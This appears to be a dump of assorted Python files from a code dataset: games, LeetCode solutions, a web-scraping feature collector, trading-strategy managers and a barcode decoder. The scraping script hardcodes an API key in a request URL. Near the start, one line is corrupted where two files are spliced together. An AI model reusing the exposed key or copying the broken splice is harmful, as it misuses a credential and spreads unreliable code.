circleRange(self.recPos,circleAdd(self.recPos,self.pushAhead))\n for i in l:\n if i not in self.notRecInfo:\n ss+='0'\n else:\n ss+='1'\n co += 1\n if co==8:\n re += struct.pack('B',int(ss,2)) \n co = 0\n ss = '' \n ss += (8-len(ss))*'0'\n re += struct.pack('B',int(ss,2)) \n return re\n \n def clearRecording(self):\n for i in circleRange(self.sendPeerPos,self.sendSelfPos):\n if i not in self.peerNotRecInfo:\n continue\n m = self.sendPackMap[i]['sendRecording']\n for k in list(m.keys()):\n v = m[k]\n if v0.5)+(X[_, 1]>0.5)\n\nFIELDS = {\"InsertionTime\": numpy.zeros((N, 1)),\n \"OriginalGyre\": orig_gyre }\n\n# buckets hold collections of particles\n# drive the system from there\n\nPB = pm.Particles.ParticleBucket(X, V, time=0.0, delta_t=5.0e-4,\n system=SYSTEM,\n parameters=PAR,\n field_data=FIELDS,\n online=False,\n pos_callbacks=[rwalk,conservation_correction])\n#time is start time, delta_t is timestep. 
Setting online only matters in parallel\n\n#example of setting field data in script, iterate over bucket\n\nfor particle in PB:\n particle.fields[\"ExampleLevel\"] = 1.0\n\nPD = pm.IO.PolyData(NAME+'_trajectories', \n {\"InsertionTime\":1,\n \"OriginalGyre\":1,\n \"ExampleLevel\":1}) # This holds trajectory information\n# output format is dictionary, key is name, value is length\n\nPD.append_data(PB) # Store initial particle positions\n\nfor i, cache in enumerate(TEMP_CACHE):\n\n print('time', cache[0])\n\n # call which updates the particles\n PB.run(time=cache[0], write=False, method=\"AdamsBashforth2\")\n\n # lets explicitly insert a new particle\n xx = numpy.array((0.3, 0.1, 0.0)) # Space is always 3d: in 2d z component is zero\n vv = TEMP_CACHE.get_velocity(xx, PB.time) # Same for velocity.\n part = pm.Particles.Particle((xx, vv, PB.time, PB.delta_t),\n system=SYSTEM,\n parameters=PAR,\n pos_callbacks=[rwalk, conservation_correction]) # Make a new particle\n part.fields[\"InsertionTime\"] = part.time # set its insertion time\n part.fields[\"OriginalGyre\"] = 0.0\n if pm.Parallel.get_rank() == 0:\n PB.particles.append(part) # Stick it in the bucket\n \n #example of setting field data inside script\n for particle in PB:\n t = particle.time\n t_0 = particle.fields[\"InsertionTime\"]\n particle.fields[\"ExampleLevel\"] = numpy.exp(-(t-t_0)**2)\n\n pm.IO.write_level_to_csv(bucket=PB, level=i, basename=NAME+'_%s'%kap,\n field_data={\"InsertionTime\":1,\n \"OriginalGyre\":1,\n \"ExampleLevel\":1}) # Dump just this timelevel\n pm.IO.write_level_to_polydata(bucket=PB, level=i, basename=NAME+'_%s'%kap,\n field_data={\"InsertionTime\":1,\n \"OriginalGyre\":1,\n \"ExampleLevel\":1}) # Dump just this timelevel\n PD.append_data(PB)\n\n print('min, max: pos_x', PB.pos_as_array()[:, 0].min(), PB.pos_as_array()[:, 0].max())\n print('min, max: pos_y', PB.pos_as_array()[:, 1].min(), PB.pos_as_array()[:, 1].max())\n print('min, max: vel_x', PB.vel_as_array()[:, 0].min(), PB.vel_as_array()[:, 0].max())\n print('min, max: vel_y', PB.vel_as_array()[:, 1].min(), PB.vel_as_array()[:, 1].max())\n\nPD.write() # write trajectories\n","sub_path":"examples/langevin/pm.py","file_name":"pm.py","file_ext":"py","file_size_in_byte":5443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"156756937","text":"from PIL import Image # Image -> 클래스, 대문자로 시작, 스태틱메소드(생성 안 하고 바로 호출), 팩토리함수, 객체의 생성 과정 쉽게\n\n# open image\nim = Image.open(\"cute_cat.jpg\") # 이미지객체의 인스턴스 = im\n\nprint(im.size)\n\nim.save(\"cute_cat.png\") # png로 저장\n\nim.show()\n","sub_path":"python/test/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"201979457","text":"import random\n\n\nclass PigMoves(Opponent):\n\n def decision(self):\n if self.count > 0:\n return \"hold\"\n elif self.score == 0 and self.count > 0:\n return \"bust\"\n else:\n self.count += 1\n return \"roll\"\n\nclass Game2(Game):\n\n def __init__(self):\n self.p1 = Player()\n self.p2 = Opponent()\n self.round_count = 0\n\n def pick_first(self):\n guess = input(\"Pick heads or tails. \").lower()\n coin_toss = random.choice(['heads', 'tails'])\n if guess == coin_toss:\n print(\"You go first.\")\n return True\n elif guess != 'heads' and guess != 'tails':\n print(\"Fine, wise guy. 
Your opponent goes first\")\n return False\n else:\n print(\"Your opponent goes first.\")\n return False\n\n def p1_turn(self):\n self.p1.roll_or_hold()\n\n def p2_turn(self):\n self.p2.roll_or_hold()\n\n def play_round_me(self):\n self.p1_turn()\n self.p2_turn()\n\n def play_round_you(self):\n self.p2_turn()\n self.p1_turn()\n\n def full_game(self):\n pick = self.pick_first()\n if pick == True:\n while self.round_count < 7:\n self.play_round_me()\n self.round_count += 1\n self.win_lose()\n if pick == False:\n while self.round_count < 7:\n self.play_round_you()\n self.round_count += 1\n self.win_lose()\n\n def win_lose(self):\n if self.p1.total_score > self.p2.total_score:\n return \"YOU WIN! Final score is {}, to {}.\".format(\n self.p1.total_score, self.p2.total_score)\n else:\n return \"YOU LOSE! Final score is {}, to {}.\".format(\n self.p1.total_score, self.p2.total_score)\n\nplay_game = Game()\nplay_game.full_game()\n","sub_path":"pig_move_opponent.py","file_name":"pig_move_opponent.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"195143459","text":"from newspaper import Article\nfrom textblob import TextBlob\nfrom textatistic import Textatistic\nimport urllib.request\nimport re\nimport pandas as pd\nimport requests\nfrom urllib.parse import urlsplit\nimport time\nimport os\n\ndef conv(s):\n try:\n return int(s)\n except ValueError:\n return s\n\ndf=pd.read_csv('enk.csv')\nquery = df[\"url\"].values\n#query =[\"https://en.wikipedia.org/wiki/Vaccine\" , \"https://en.wikipedia.org/wiki/Vaccine\"]\nfor i in range(len(query)):\n try:\n article = Article(query[i])\n article.download()\n article.parse()\n text = article.text\n blob = TextBlob ( text )\n s = Textatistic ( text )\n afb = len(article.images)\n vals = requests.get ( query[i] , timeout=4 , allow_redirects=False ).elapsed.total_seconds ( )\n st = \"/&callback=process&key=57bf606e01a24537ac906a86dc27891f94a0f587\"\n # zz = urlopen ( url )\n quez = 'http://api.mywot.com/0.4/public_link_json2?hosts=' + query[i] + st\n stt = urllib.request.urlopen ( quez ).read ( )\n stt = str ( stt )\n wot = re.findall ( '\\d+' , stt )\n ##z=[[conv(s) for s in line.split()] for line in wot]\n z = [ conv ( s ) for s in wot ]\n high = (z[ 1 ])\n low = (z[ 2 ])\n zz = \"{0.scheme}://{0.netloc}/\".format ( urlsplit ( query[i] ) )\n zurlz = \"https://web.archive.org/web/0/\" + str ( zz )\n r = requests.get ( zurlz , allow_redirects=False )\n data = r.content\n years = re.findall ( '\\d+' , str ( data ) )\n years = [ conv ( s ) for s in years ]\n years = (years[ 0 ])\n years = int ( str ( years )[ :4 ] )\n cols = {'yeararchive': [ years ] ,\n 'lowwot': [ low ] ,\n 'highwot': [ high ] ,\n 'reponsetime': [ vals ] ,\n 'wordcount': [ s.word_count ] ,\n 'subjectivity': [ blob.sentiment.subjectivity ],\n 'polarity': [ blob.sentiment.polarity ] ,\n 'fleschscore': [ s.flesch_score ],\n 'pictures': [afb],\n #'kw': [ kw ] ,\n 'url': [ query[i] ]}\n df = pd.DataFrame.from_dict ( cols )\n #df.to_csv('ozzy.csv', index=False)\n\n if not os.path.isfile('ft.csv'):\n df.to_csv('ft.csv', index=False)\n else: # else it exists so append without writing the header\n df.to_csv('ft.csv', mode='a', header=False, index=False)\n\n time.sleep(2)\n except:\n pass\n\n#na bestanden\nb = pd.read_csv(\"ft.csv\")#labels\na = pd.read_csv(\"lab.csv\")#features moet headers hebben\nmerged = a.merge(b, on='url', how='inner')\n#del merged['urlz']\nmerged.to_csv(\"mjoined.csv\", 
index=False)\n","sub_path":"collect/collect.py","file_name":"collect.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"38692360","text":"#!/usr/bin/python\n\n# Simple example of some supporting classes for a\n# moving average crossover system\n\n# Also see the __init__.py where these are registered with names in\n# the EntryManagerRegistry and ExitManagerRegistry\n\nfrom backtest.entrymanager import EntryManager\nfrom backtest.exitmanager import ExitManager\nfrom backtest.strategy import Trade\nfrom indicators.indicators import SimpleMovingAverage, AdjustedClose\n\n\nclass MACrossoverEntryManager(EntryManager):\n \"\"\" Enter on cross higher of the fast ma over the slow ma \"\"\"\n\n def __init__(self, settings, name=None):\n EntryManager.__init__(self, settings, name=name)\n\n fastma = settings.getint(\"MACrossoverEntryManager\", \"fastma\")\n slowma = settings.getint(\"MACrossoverEntryManager\", \"slowma\")\n\n # AdjustedClose is adjusted for splits and dividends\n self.close = AdjustedClose()\n self.fastma = SimpleMovingAverage(metric=self.close, period=fastma)\n self.slowma = SimpleMovingAverage(metric=self.close, period=slowma)\n\n # add the metrics to the entry manager, this will cause them\n # to automatically handle the stream of bar data\n self._addMetric(self.close)\n self._addMetric(self.fastma)\n self._addMetric(self.slowma)\n\n def checkTrade(self, trade):\n if trade is not None:\n # we don't scale in additional size, already in a trade\n return trade\n if self.fastma.ready() and self.slowma.ready() \\\n and self.fastma.value() > self.slowma.value() \\\n and self.close.value() > 0:\n # new trade\n entry = self.close.value()\n # no stops for this simple strategy\n stop = 0.0\n # note, self.periodData is the last bar seen, this is provided from\n # the base class EntryManager\n trade = Trade(self.periodData.stock, self.periodData.date, entry, stop)\n return trade\n return None\n\n\nclass MACrossoverExitManager(ExitManager):\n \"\"\" Exit on a downard cross of a fast ma through a slow ma.\n\n This only handles long trades\n \"\"\"\n\n def __init__(self, settings):\n ExitManager.__init__(self)\n\n fastma = settings.getfloat(\"MACrossoverExitManager\", \"fastma\")\n slowma = settings.getfloat(\"MACrossoverExitManager\", \"slowma\")\n self.close = AdjustedClose()\n self.fastma = SimpleMovingAverage(metric=self.close, period=fastma)\n self.slowma = SimpleMovingAverage(metric=self.close, period=slowma)\n\n # add the metrics to the entry manager, this will cause them\n # to automatically handle the stream of bar data\n self._addMetric(self.close)\n self._addMetric(self.fastma)\n self._addMetric(self.slowma)\n\n def checkTrade(self, trade):\n if trade is not None and self.fastma.ready() and self.slowma.ready() \\\n and trade.exit is None \\\n and self.fastma.value() < self.slowma.value():\n trade.exit = self.perioddata.date\n trade.exitPrice = self.perioddata.adjustedClose\n\n return trade\n","sub_path":"user-backtests/userbacktests/macrossover.py","file_name":"macrossover.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"77363212","text":"import numpy as np\n\nBOARD_SIZE = 6\n\nMANCALA_A = BOARD_SIZE\nMANCALA_B = 2*BOARD_SIZE + 1\n\nDRAW = -1\nPLAYER_A = 0\nPLAYER_B = 1\n\nSTARTING_SEEDS = 3\nTOTAL_SEEDS = BOARD_SIZE*STARTING_SEEDS*2\n\nclass mancala():\n def player_letter(self, player):\n 
if player == PLAYER_A:\n return 'A'\n else:\n return 'B'\n\n def holes(self, player):\n if player == PLAYER_A:\n return self.board[:BOARD_SIZE]\n else:\n return self.board[BOARD_SIZE+1:-1]\n\n def hole_indices(self, player):\n if player == PLAYER_A:\n return np.arange(BOARD_SIZE)\n else:\n return np.arange(BOARD_SIZE+1, 2*BOARD_SIZE + 1)\n\n def mancala(self, player):\n if player == PLAYER_A:\n return self.board[BOARD_SIZE]\n else:\n return self.board[-1]\n\n def add_holes(self, a, b):\n # Hole addition (wraps around the board)\n return (a + b) % (2*BOARD_SIZE + 2)\n\n def opposite_hole(self, h):\n # Find the opposite hole on the board\n return self.add_holes(h, -2 * (h % (BOARD_SIZE + 1)) - 2)\n\n def winning_player(self):\n if self.mancala(PLAYER_A) > self.mancala(PLAYER_B):\n return PLAYER_A\n elif self.mancala(PLAYER_B) > self.mancala(PLAYER_A):\n return PLAYER_B\n else:\n return DRAW\n\n def valid_moves(self):\n # Array of valid moves\n if self.completed():\n return None\n # Get player's holes\n holes = self.holes(self.turn)\n # Can only move where hole is not empty\n return np.where(holes > 0)[0]\n\n def opponent(self):\n if self.turn == PLAYER_A:\n return PLAYER_B\n else:\n return PLAYER_A\n\n def display_player(self, player):\n # Visualise the board as text, from player's perspective\n if player == PLAYER_A:\n this_player = PLAYER_A\n other_player = PLAYER_B\n else:\n this_player = PLAYER_B\n other_player = PLAYER_A\n fmt = ' {} ' + '|{:^3}'*BOARD_SIZE + '|###'\n print(fmt.format(self.player_letter(other_player),\n *self.holes(other_player)[::-1])) # Other player backwards\n fmt = '{:^3}' + '-' + '----'*BOARD_SIZE + '{:^3}'\n print(fmt.format(self.mancala(other_player),\n self.mancala(this_player))) # Mancalas\n fmt = '###' + '|{:^3}'*BOARD_SIZE + '| {} '.format(self.player_letter(this_player))\n print(fmt.format(*self.holes(this_player))) # This player\n\n def display_current(self):\n # Visualise the board as text, from current player's perspective\n self.display_player(self.turn)\n\n def __init__(self):\n # Board of 6 holes each side plus two mancalas\n self.board = 3*np.ones(BOARD_SIZE*2 + 2, dtype=int)\n self.board[MANCALA_A] = 0\n self.board[MANCALA_B] = 0\n # Indicator for player turn\n self.turn = PLAYER_A\n\n def swap_players(self):\n self.turn = self.opponent()\n\n def completed(self):\n # Check for game completion\n remaining_seeds = sum(s for s in self.holes(PLAYER_A))\n if remaining_seeds == 0:\n # Game over, empty opponent's seeds into their mancala\n self.board[MANCALA_B] += sum(s for s in self.holes(PLAYER_B))\n self.board[self.hole_indices(PLAYER_B)] = 0\n return True\n remaining_seeds = sum(s for s in self.holes(PLAYER_B))\n if remaining_seeds == 0:\n # Game over, empty opponent's seeds into their mancala\n self.board[MANCALA_A] += sum(s for s in self.holes(PLAYER_A))\n self.board[self.hole_indices(PLAYER_A)] = 0\n return True\n return False\n\n def move(self, n):\n # Play current player's nth hole (n starts at zero)\n if n not in self.valid_moves():\n raise RuntimeError('Invalid move')\n\n if self.turn == PLAYER_A:\n hole = n\n this_mancala = MANCALA_A\n other_mancala = MANCALA_B\n else:\n hole = BOARD_SIZE + 1 + n\n this_mancala = MANCALA_B\n other_mancala = MANCALA_A\n # Remove seeds from this hole\n collected_seeds = self.board[hole]\n self.board[hole] = 0\n while collected_seeds > 0:\n hole = self.add_holes(hole, 1)\n if hole != other_mancala:\n # Not in opponent's mancala so put seed in\n self.board[hole] += 1\n collected_seeds -= 1\n # Decide what to do at 
end of move\n if (self.board[hole] == 1) & (hole in self.hole_indices(self.turn)):\n # Ended in own empty hole so capture opponent's pieces\n self.board[this_mancala] += self.board[hole]\n self.board[hole] = 0\n self.board[this_mancala] += self.board[self.opposite_hole(hole)]\n self.board[self.opposite_hole(hole)] = 0\n # Check for end of game\n if self.completed():\n return\n if hole != this_mancala:\n # Not in mancala so play passes to opponent\n self.swap_players()\n\n\nif __name__ == '__main__':\n print('Mancala game\\n')\n game = mancala()\n\n while not game.completed():\n print('Player ' + game.player_letter(game.turn) + ' to play:')\n game.display_current()\n move = 0\n while move == 0:\n try:\n move = int(input('Enter a move (1 to {}): '.format(BOARD_SIZE)))\n except ValueError:\n print('Invalid move')\n move = 0\n try:\n game.move(move - 1)\n except RuntimeError:\n print('Invalid move')\n move = 0\n print('')\n\n if game.winning_player() == DRAW:\n print('Game over: DRAW')\n elif game.winning_player() == PLAYER_A:\n print('Player A wins')\n else:\n print('Player B wins')\n game.display_player(PLAYER_A)\n\n\n\n\n\n\n\n\n\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"80649822","text":"class Solution:\n def lcs_iterative(self, string1, string2):\n m = len(string1)\n n = len(string2)\n\n dp = [[0 for i in range(m+1)] for j in range(n+1)]\n for row in dp:\n print(row)\n print()\n\n for i in range(1, n+1):\n for j in range(1, m+1):\n if string2[i-1] == string1[j-1]:\n dp[i][j] = 1 + dp[i-1][j-1]\n else:\n dp[i][j] = max(dp[i-1][j],\n dp[i][j-1])\n for row in dp:\n print(row)\n return dp[-1][-1]\n\n def lcs_recursive(self, string1, string2, m, n):\n if m < 0 or n < 0:\n return 0\n\n if string1[m] == string2[n]:\n return 1 + self.lcs_recursive(string1, string2, m-1, n-1)\n else:\n return max(self.lcs_recursive(string1, string2, m-1, n),\n self.lcs_recursive(string1, string2, m, n-1))\n\n def solve(self, str1, str2):\n a = len(str1)\n b = len(str2)\n ans1 = self.lcs_recursive(str1, str2, a-1, b-1)\n print(f'recursive ans is {ans1}')\n ans2 = self.lcs_iterative(str1, str2)\n print(f'iterative ans is {ans2}')\n\n\nif __name__ == '__main__':\n a = 'rabb'\n b = 'rab'\n obj = Solution()\n obj.solve(a, b)\n","sub_path":"scaler/dp2/dp2/lcs.py","file_name":"lcs.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"378632656","text":"'''\nIn a deck of cards, each card has an integer written on it.\n\nReturn true if and only if you can choose X >= 2 such that it is possible to split the entire deck into 1 or more groups of cards, where:\n\nEach group has exactly X cards.\nAll the cards in each group have the same integer.\n \n\nExample 1:\n\nInput: deck = [1,2,3,4,4,3,2,1]\nOutput: true\nExplanation: Possible partition [1,1],[2,2],[3,3],[4,4].\n\nhttps://leetcode.com/problems/x-of-a-kind-in-a-deck-of-cards/\n'''\n\nfrom typing import List\nfrom collections import Counter\nfrom math import gcd\nfrom functools import reduce\n\nclass Solution:\n # solution 1\n def hasGroupsSizeX(self, deck: List[int]) -> bool:\n count = Counter(deck)\n print('count = ', count)\n\n key_min = min(count.keys(), key = (lambda k: count[k]))\n count_min = count[key_min] + 1\n # print('min count = ', count[key_min])\n \n for i in range(2, count_min):\n if all(v % i == 0 for v in count.values()):\n return True \n \n return 
False\n \n # solution 2\n def hasGroupsSizeX1(self, deck: List[int]) -> bool:\n return reduce(gcd, Counter(deck).values()) >= 2\n\n\nif __name__ == '__main__':\n s = Solution()\n\n deck1 = [1,2,3,4,4,3,2,1];\n assert s.hasGroupsSizeX(deck1) == True\n deck2 = [1]\n assert s.hasGroupsSizeX(deck2) == False\n deck3 = [1,1,1,2,2,2,3,3]\n assert s.hasGroupsSizeX(deck3) == False\n deck4 = [1,1]\n assert s.hasGroupsSizeX(deck4) == True\n deck5 = [1,1,2,2,2,2]\n assert s.hasGroupsSizeX(deck5) == True\n deck6 = [1,1,1,1,2,2,2,2,2,2]\n assert s.hasGroupsSizeX(deck6) == True","sub_path":"src/python/array/x_of_a_kind_in_a_deck_of_cards.py","file_name":"x_of_a_kind_in_a_deck_of_cards.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"505393479","text":"import cv2 as cv\nimport numpy as np\nfrom math import pi, log\n\nBARCODE_CONVERSION = {3211: 0,2221: 1, 2122: 2, 1411: 3, 1132: 4, 1231: 5, 1114: 6, 1312: 7, 1213: 8, 3112: 9}\n\ndef get_image(src):\n\t\"\"\"Read in the image file from its location in memory and return image object.\n\t\n\tParameters: \n\t\tsrc (string): filepath to image\n\n\tReturns:\n\t\tndarray: image in RGB format\n\t\"\"\"\n\n\treturn cv.imread(src)\n\ndef preprocess_image(image):\n\t\"\"\"Takes a cropped image of a barcode and returns a white-padded image with straightened bars.\n\n\t\n\tParameters:\n\t\timage (ndarray): image in RGB format\n\n\tReturns:\n\t\tndarray: white padded image with straightened black bars in GRAY format\n\t\"\"\"\n\n\tgray = cv.cvtColor(image, cv.COLOR_BGR2GRAY) \n\tret,BW = cv.threshold(gray,0,255,cv.THRESH_BINARY+cv.THRESH_OTSU)\n\tstraight = reorient(BW)\n\t#vert = create_vertical_lines(straight)\n\tpadded = cv.copyMakeBorder(straight,5,5,5,5,cv.BORDER_CONSTANT,value = 255)\n\t#ret,BW = cv.threshold(padded,127,255,0)\n\treturn padded\n\ndef create_vertical_lines(image,threshold = (255//2)+50):\n\t\"\"\"Takes an image and fills every column that has an average value of less than threshold with black and every other column with white.\n\n\tParameters:\n\t\timage (ndarray): GRAY formatted image\n\t\tthreshold (int): average value that a column must exceed to be filled with white\n\n\tReturns:\n\t\tndarray: black and white GRAY formatted image with each column being entirely white or black based on average value compared to threshold\n\t\"\"\"\n\n\tw,h = image.shape\n\tvline_colors = np.where(np.average(image,axis = 0)>=threshold,255,0)\n\treturn np.uint8(vline_colors*np.ones((w,h)))\n\n\ndef draw_contours(gray_image,contours,cnt_color = (0,255,0), thickness = 1):\n\t\"\"\"Draws given contours on image.\n\n\tParameters:\n\t\tgray_image (ndarray): GRAY formatted image to have contours drawn on\n\t\tcontours (list): List of contours in cv contours format\n\t\tcnt_color (tuple): RGB value to draw contour in\n\t\tthickness (int): thickness to draw contours in\n\n\n\tReturn:\n\t\tndarray: image in RGB format with contours drawn on it in cnt_color \n\t\"\"\"\n\n\tcolor = cv.cvtColor(gray_image,cv.COLOR_GRAY2BGR)\n\tcv.drawContours(color,contours,-1,cnt_color, thickness)\n\treturn color\n\t\ndef show_image(image):\n\t\"\"\"Shows image in new window titled image and waits for any keystroke to terminate.\n\n\tParameters:\n\t\timage (ndarray): image to be displayed\n\t\"\"\"\n\n\tcv.imshow(\"image\",image)\n\tcv.waitKey(0)\n\ndef make_box(rectangles):\n\t\"\"\"Converts list of rectangles to np array of integer corner points \n\n\tParameters:\n\t\trectangles 
(array-like): list of rectangles in cv minAreaRectangle format\n\n\tReturns: \n\t\tnp array: list containing corner points of each rectangle in a tuple\n\t\"\"\"\n\treturn np.array([np.int0(cv.boxPoints(tuple(rect))) for rect in rectangles])\n\ndef classify(widths):\n\t\"\"\"Takes a series of single colored (either black or white) bar widths from barcode and \n\tconverts it into a list of classifications, where each bar width is classified into one \n\tof {1,2,3,4} based on relative width.\n\n\tParameters:\n\t\twidths (list): list of floats representing the widths of bars\n\n\tReturns:\n\t\tnp array: list of same length of widths where each element represents the classification \n\t\t\t\t\tthe corresponding width in widths\n\n\t \"\"\"\n\n\tminimum = (widths[0]+widths[-1])/2\n\tfirst_bin = np.average([x for x in widths if round(x/minimum)==1])\n\tsecond_bin = np.average([x for x in widths if round(x/first_bin) == 2])\n\tstep_size = np.max([second_bin/2,first_bin])\n\tbins = np.array([first_bin,second_bin,3*step_size,4*step_size])\n\t\n\tclsfy = np.vectorize(lambda x: np.argmin(np.abs(bins-np.array([x]*4)))+1)\n\t\n\treturn clsfy(widths)\n\ndef space_between_rects(rects):\n\t\"\"\"Finds the amount of space between each consecutive rectangle\n\t\n\tParameters: \n\t\trects (ndarray): list of rectangles in cv minAreaRectangle format\n\n\tReturns:\n\t\tnp array: element i corresponds to the distance between rects[i] and rects[i+1]\n\t\"\"\"\n\n\treturn np.array([rects[i+1][0][0]-rects[i][0][0]-(rects[i+1][1][0]+rects[i][1][0])/2 for i in range(len(rects)-1)])\n\ndef interleave(list1,list2):\n\t\"\"\"Interleaves two lists\n\n\tParaemters:\n\t\tlist1 (np array): first list of size n to be interleaved \n\t\tlist2 (np array): second list of size n or n-1 to be interleaved\n\n\tReturns:\n\t\tnp array: Both lists interleaved with first list going first.\n\t\"\"\"\n\n\tout = np.empty((list1.size+list2.size))\n\tout[::2] = list1\n\tout[1::2] = list2\n\treturn out\n\ndef reverse(num):\n\tnum_str = str(num)\n\tnum_str = num_str[::-1]\n\treturn int(num_str)\n\ndef get_closest_codes(num):\n\tmin_dist = 16\n\tclosest_codes = [] \n\tfor code in BARCODE_CONVERSION.keys():\n\t\tdistance = sum([abs(int(n)-int(m)) for n,m in zip(str(code),str(num))])\n\t\tif distance < min_dist:\n\t\t\tclosest_codes = [code]\n\t\t\tmin_dist = distance\n\t\telif distance == min_dist:\n\t\t\tclosest_codes.append(code)\n\n\treturn [BARCODE_CONVERSION[code] for code in closest_codes]\n\n\ndef code_to_num(code):\n\t\"\"\"Returns barcode number corresponding to 4 digit barcode code\n\n\tParameters:\n\t\tcode (int): four digit code to be translated\n\n\tReturns:\n\t\tint: barcode number corresponding to code\n\t\"\"\"\n\n\tif code in BARCODE_CONVERSION:\n\t\treturn BARCODE_CONVERSION[code]\n\telif reverse(code) in BARCODE_CONVERSION:\n\t\treturn BARCODE_CONVERSION[reverse(code)]\n\telse:\n\t\treturn -1\n\ndef recover_barcode(translated,original):\n\tcheck = (-3*sum([i for i in translated[0::2] if not i == -1]) - sum([i for i in translated[1:11:2] if not i == -1]))%10\n\tindices = [i for i,num in enumerate(translated) if num == -1]\n\tsubstitutes = [get_closest_codes(original[i]) for i in indices]\n\tfind_matching(indices,substitutes,check,translated[-1],translated)\n\treturn translated\n\n\ndef find_matching(indices,substitutes,check,checksum,translated):\n\tif len(substitutes) == 0:\n\t\treturn True\n\tfor substitute in substitutes[0]:\n\t\tif indices[0] % 2 == 1 and indices[0] < 11:\n\t\t\tnew_check = (check - 
substitute)%10\n\t\telif indices[0] == 11:\n\t\t\tchecksum = substitute\n\t\t\tnew_check = check\n\t\telse:\n\t\t\tnew_check = (check - 3*substitute)%10\n\n\t\tif len(indices)>1:\n\t\t\ttranslated[indices[0]] = substitute\n\t\t\tif find_matching(indices[1:],substitutes[1:],new_check,checksum,translated):\n\t\t\t\treturn True\n\t\t\ttranslated[indices[0]] = -1\n\t\telif checksum == new_check: #base case\n\t\t\ttranslated[indices[0]] = substitute\n\t\t\treturn True\n\treturn False\n\n\ndef translate_to_numbers(list1):\n\t\"\"\"Takes list of sequential classified barcode widths and translates them to a UPC number. Puts -1 in places where the set of four digits doesn't correspond to a code.\n\n\tParameters: \n\t\tlist1 (list): list of values in {1,2,3,4} where every four values corresponds to a digit in the UPC number\n\n\tReturns:\n\t\tlist: list with each element being a the next digit of the UPC number\n\t\"\"\"\n\n\tif len(list1) % 4 != 0:\n\t\treturn [-1]*12\n\n\tcode = np.int0((np.array([1000,100,10,1]*(len(list1)//4))*list1))\n\tcode = code.reshape((len(list1)//4,4))\n\tcode = np.sum(code,axis=1)\n\ttranslate = np.vectorize(code_to_num)\n\ttranslated = translate(code)\n\t\n\tif -1 in translated:\n\t\ttranslated = recover_barcode(translated,code)\n\n\treturn translated\n\ndef straighten_rectangles(rects):\n\t\"\"\"Takes all rectangles that are more than -45 degrees tilted and re-encodes them as a rectangle with angle 90 + original angle\n\n\tParameters:\n\t\trects (array-like): list of rectangles in cv minAreaRect format\n\n\tReturns:\n\t\tlist: Same list of rectangles where no rectangle has angle less than -45 degrees. \n\t\"\"\"\n\n\tdef flip_rect(rect):\n\t\tif rect[2] < -45:\n\t\t\treturn (rect[0],(rect[1][1],rect[1][0]),rect[2]+90)\n\t\treturn rect\n\n\treturn [flip_rect(rect) for rect in rects]\n\ndef get_barcode_rectangles(processed_image):\n\t\"\"\"Takes a cropped GRAY image of a barcode and returns a list of rectangles representing the black bars on the barcode\n\n\tParameters:\n\t\tprocessed_image (ndarray): image in GRAY format of barcode, already cropped and preprocessed (see preprocess image)\n\n\tReturns:\n\t\tnp array: rectangles corresponding to black barcode bars in cv minAreaRect format sorted by increasing x value in image \n\t\"\"\"\n\t\n\tcontours, hierarchy = cv.findContours(processed_image, mode=cv.RETR_LIST, method=cv.CHAIN_APPROX_SIMPLE)\n\n\trectangles = np.array([cv.minAreaRect(cnt) for cnt in contours])\n\trectangles = straighten_rectangles(rectangles)\n\n\timage_with_barcodes = draw_contours(processed_image,make_box(rectangles))\n\n\tbarcode_rectangles = np.array([rect for rect in rectangles if rect[1][0] != 0 and rect[1][1]/rect[1][0] >= 5]) #changed 5 to 3\n\timage_with_barcodes = draw_contours(processed_image,make_box(barcode_rectangles))\n\n\tbarcode_center_y = np.median([rect[0][1] for rect in barcode_rectangles])\n\tbarcode_height = np.median([rect[1][1] for rect in barcode_rectangles])\n\n\tbarcode_rectangles = np.array([rect for rect in barcode_rectangles if np.abs(rect[0][1]-barcode_center_y) < barcode_height/2])\n\timage_with_barcodes = draw_contours(processed_image,make_box(barcode_rectangles))\n\n\tordered_barcode_rectangles = np.array(sorted(barcode_rectangles,key=lambda x:x[0][0]))\n\treturn ordered_barcode_rectangles\n\ndef measure_bars(processed_image):\n\th,w = processed_image.shape\n\theights = [h//3,h//2,2*h//3]\n\tbinary_image = processed_image>0\n\n\twidths = []\n\tfor height in heights:\n\t\twidth = []\n\t\trow = 
binary_image[height]\n\t\tprev = 1\n\t\tprev_transition_index = 0\n\t\tfor i in range(len(row)):\n\t\t\tif row[i] != prev:\n\t\t\t\twidth.append(i - prev_transition_index)\n\t\t\t\tprev = row[i]\n\t\t\t\tprev_transition_index = i\n\t\tif len(width) == 60:\n\t\t\twidths.append(width[1:-1])\n\treturn np.average(widths,axis=0)\n\ndef classify_widths(widths):\n\tgaps = classify(widths[1::2])\n\tbars = classify(widths[0::2])\n\tfull_code = interleave(bars,gaps)\n\tfull_code = np.concatenate((full_code[3:27],full_code[32:56]))\n\treturn full_code\n\ndef classify_bars(ordered_barcode_rectangles):\n\t\"\"\"Takes a list of black barcode rectangles and returns the classified widths of all of the bars in the image (black and white) in increasing x order\n\n\tParameters:\n\t\tordered_barcode_rectangles (array-like): rectangles in cv minAreaRect format corresponding to black bars in barcode in increasing x order in image\n\n\tReturns:\n\t\tnp array: list of bar-width classifications for all bars in barcode in increasing x order\n\t\"\"\"\n\n\tgaps = classify(space_between_rects(ordered_barcode_rectangles))\n\tbars = classify(np.array([rect[1][0] for rect in ordered_barcode_rectangles]))\n\tfull_code = interleave(bars,gaps)\n\tfull_code = 